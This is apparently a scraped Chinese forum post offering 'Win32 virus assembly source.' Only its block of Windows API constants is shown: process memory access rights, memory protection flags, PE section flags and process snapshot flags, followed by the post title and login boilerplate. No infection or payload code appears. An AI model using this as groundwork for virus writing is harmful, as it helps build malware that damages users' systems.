PAGE_SIZE = 1000H

PAGE_NOACCESS = 1
PAGE_READONLY = 2
PAGE_READWRITE = 4
PAGE_WRITECOPY = 8
PAGE_EXECUTE = 16
PAGE_EXECUTE_READWRITE = 40H

MEM_COMMIT = 1000H
MEM_RESERVE = 2000H
MEM_DECOMMIT = 4000H
MEM_RELEASE = 8000H

FILE_MAP_COPY = 1
FILE_MAP_WRITE = 2
FILE_MAP_READ = 4
FILE_MAP_ALL_ACCESS = 0F001FH

IMAGE_SCN_CNT_CODE = 20H
IMAGE_SCN_CNT_INITIALIZED_DATA = 40H
IMAGE_SCN_MEM_SHARED = 10000000H
IMAGE_SCN_MEM_EXECUTE = 20000000H
IMAGE_SCN_MEM_READ = 40000000H
IMAGE_SCN_MEM_WRITE = 80000000H
IMAGE_SCN_MEM_ALL = 0C0000060H

TH32CS_SNAPHEAPLIST = 1
TH32CS_SNAPPROCESS = 2
TH32CS_SNAPTHREAD = 4
TH32CS_SNAPMODULE = 8
TH32CS_SNAPALL = 0FH
TH32CS_INHERIT = 80000000H

VER_PLATFORM_WIN32s = 0
VER_PLATFORM_WIN32_WINDOWS = 1
VER_PLATFORM_WIN32_NT = 2

PROCESS_VM_OPERATION = 8H
PROCESS_VM_READ = 10H
PROCESS_VM_WRITE = 20H
PROCESS_DUP_HANDLE = 40H
PROCESS_CREATE_PROCESS = 80H
PROCESS_SET_QUOTA = 100H
PROCESS_SET_INFORMATION = 200H
PROCESS_QUERY_INFORMATION = 400H
PROCESS_OPEN_ACCESS = PROCESS_VM_OPERATION OR PROCESS_VM_READ OR PROCESS_VM_WRITE

ERROR_ALREADY_EXISTS = 183

CREATE_SUSPENDED = 4

MB_OK = 0
MB_OKCANCEL = 1
MB_ABORTRETRYIGNORE = 2
MB_YESNOCANCEL = 3
MB_YESNO = 4
MB_RETRYCANCEL = 5

IDOK = 1
IDCANCEL = 2
IDABORT = 3
IDRETRY = 4
IDIGNORE = 5
IDYES = 6
IDNO = 7

EXCEPTION_EXECUTE_HANDLER = 1
EXCEPTION_CONTINUE_SEARCH = 0
EXCEPTION_CONTINUE_EXECUTION = -1

WAIT_TIMEOUT = 0102H
WAIT_FAILED = 0FFFFFFFFH
WAIT_OBJECT_0 = 0

EVENT_MODIFY_STATE = 2

兰陵月 · 发表于 2016-11-25 10:18:19

[技术交流] 代码放送【Win32 病毒汇编源码，WinXP下调试通过】

马上注册，结交更多好友，享用更多功能^_^

评分

账号		自动登录	找回密码
密码			立即注册